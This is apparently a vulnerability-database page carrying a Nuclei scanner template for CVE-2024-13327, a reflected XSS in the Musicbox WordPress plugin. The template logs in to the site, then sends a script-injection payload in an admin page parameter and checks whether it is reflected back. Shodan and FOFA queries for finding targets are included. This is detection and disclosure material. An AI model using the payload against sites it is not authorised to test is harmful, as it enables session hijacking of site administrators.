CVE-2024-13327: Musicbox WordPress - Reflected XSS

2026-02-24 Musicbox WordPress PoC Public

Description

contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.

PoC

id: CVE-2024-13327

info:
  name: Musicbox WordPress - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.
  impact: |
    Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://wpscan.com/vulnerability/abc8f3e1-2aee-44f0-8ecd-0ea424c0540a/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13327
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13327
    cwe-id: CWE-79
    epss-score: 0.00584
    epss-percentile: 0.46342
    cpe: cpe:2.3:a:webdesignby:musicbox:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.component:"WordPress"
    fofa-query: body="webdesignby-musicbox"
  tags: cve,cve2024,wordpress,wp,wp-plugin,musicbox,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, 'wordpress_logged_in')
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=webdesignby-musicbox&webdesignby-musicbox-filter=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>","musicbox")
        condition: and
# digest: 4b0a00483046022100fb366fe4a80456c6e48662a9332f4acfbfeadb2d5758db0015db058b32c482b0022100d51741d5dd7e4de71b3f3729eb0648cba738830eccceb86b0d073f7286a5e4e5:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities